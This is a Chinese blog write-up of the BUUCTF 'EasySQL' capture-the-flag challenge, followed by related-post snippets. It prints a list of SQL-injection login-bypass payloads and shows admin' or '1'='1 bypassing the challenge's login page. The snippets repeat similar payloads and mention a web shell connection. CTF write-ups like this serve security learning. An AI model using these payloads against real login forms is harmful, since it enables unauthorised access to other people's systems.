CTF-Web-[极客大挑战2019]EasySQL

最新推荐文章于 2024-09-10 18:34:04 发布
最新推荐文章于 2024-09-10 18:34:04 发布
阅读量2.6k 收藏 18
点赞数 8
分类专栏: CTF 文章标签: CTF SQL SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45163122/article/details/105887917
版权

CTF-Web-[极客大挑战2019]EasySQL

博客说明

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

CTP平台

网址

https://buuoj.cn/challenges

题目

Web类,[极客大挑战2019]EasySQL

image-20200502103354598

打开题目的实例

image-20200502104017859

思路

题目类型是Web类型的,而且是一个登录页面,首先考虑的是否是SQL注入,这里提供一下万能密码表

万能密码表(收集于网络)

语言万能密码
PHP‘or 1=1/
"or “a”=“a
"or 1=1–
“or”=”
“or”="a’=‘a
"or1=1–
“or=or”
’‘or’=‘or’
’) or (‘a’=‘a
’.).or.(’.a.’=’.a
’or 1=1
’or 1=1–
'or 1=1/
‘or"="a’=‘a
’or’ ‘1’=‘1’
‘or’’=’
‘or’’=’‘or’’=’
‘or’=‘1’
‘or’=‘or’
'or.‘a.’=‘a
’or1=1–
1’or’1’=‘1
a’or’ 1=1–
a’or’1=1–
or ‘a’='a’
or 1=1–
or1=1–
asp aspx"or “a”="a
’.).or.(’.a.’=’.a
or 1=1–
‘or 1=1–
a’or’ 1=1–
“or 1=1–
'or.‘a.’='a
"or”="a’=‘a
’or’’=‘
or’=‘or’
jsp1’or’1’=‘1
admin’ or 1=1/*

查看源代码

image-20200502105456937

发现是php写的,于是使用php的万能密码尝试

admin' or '1'='1

拼接的sql语句为

username=admin' or '1'='1&password=admin' or '1'='1

发现已经成功登录

image-20200502110156522

感谢

BUUCTF

以及勤劳的自己

归子莫
关注
专栏目录
WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 400
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
BUUCTF Web 极客挑战 2019 EasySQL
Brilliant_orange的博客
11-22 1056
(当然,我们只是猜测闭合符号是单引号,其他题目也可能是双引号)接下来,我们试试用一下万能账号或者密码两种方法(优先级:【and】>【=】>【or】,语句为真,可行,得到flag。(#后面内容注释掉了),也为真,得到flag。
2024.9.9(极客挑战 2019]EasySQL,[极客挑战 2019]Knife)
最新发布
2201_75556700的博客
09-10 162
2、遇到这样的登录界面,先尝试admin和万能密码(1' or 1=1#),拿到flag。3、打开蚁剑,空白处右键,选择添加数据,输入题目地址和连接密码。2、打开菜刀或者蚁剑,进行连接,这里我是用蚁剑。题目一:极客挑战 2019]EasySQL。题目二:[极客挑战 2019]Knife。5、双击链接,找到根目录,下滑找到flag。1、点开题目链接,来到下面的界面。1、点开链接,来到下面的页面。4、点击添加,成功添加。6、双击flag文件夹。
极客挑战 2019EasySQL
Knsec
05-13 9107
[极客挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
[极客挑战 2019]EasySQL
Sk1y的博客
12-18 545
[极客挑战 2019]EasySQL 打开题目,是一个登录界面,在用户名中输入万能密码 1' or 1=1# 试一下,密码随意写 就这样登录成功了!同时得到了flag{d94b525b-a323-4d69-b6b1-210a8e824572} 然后又试了一下,用户名和密码中只要有一个是1' or 1=1#,就可以登录成功。 上述是实际解法,如果想要更加了解原理的话,推荐一个师傅的wp——绕圈子的解法 这个师傅讲得很透彻!!! ...
Buuctf-Web-[极客挑战 2019]EasySQL
御七彩虹猫
05-12 268
Buuctf-Web-[极客挑战 2019]EasySQL
[极客挑战 2019]EasySQL1
lljiuhkhk的博客
07-20 2580
CTFsql注入web渗透,安全入门
Buuctf-Web-[极客挑战 2024]EasySQL 1 题解及思路总结(1)
2401_84281594的博客
04-28 785
(但是在本题中有两个变量,这个方法不太适用)
2024年网络安全最新Buuctf-Web-[极客挑战 2024]EasySQL 1 题解及思路总结
2401_84264096的博客
05-03 1138
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。可知此页面与数据库产生交互。
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5516
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 948
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTFWeb题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_60666921的博客
04-07 2140
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。时,形成的sql语句是。
[极客挑战2019]easysql
weixin_43952190的博客
04-22 1257
easysql 进入后这样的页面,正常用’会报错,然后用burp扫一下。 尽然就出来了! 原来要用万能密码就行了,现在总结一下 万能密码: asp aspx万能密码 1: "or “a”="a 2: ‘.).or.(’.a.’=’.a 3: or 1=1– 4: 'or 1=1– 5: a’or’ 1=1– 6: "or 1=1– 7: 'or.‘a.’...
网络安全新手CTF-Web靶场搭建实战演练指南
资源摘要信息:"为新手快速入门CTF-Web开发的一款靶场" 知识点一:靶场概念 靶场(Range)在信息安全领域指的是模拟真实网络环境的虚拟或实体场地。其目的是为安全专业人员提供一个可以进行实战演练、渗透测试、攻防...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

归子莫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值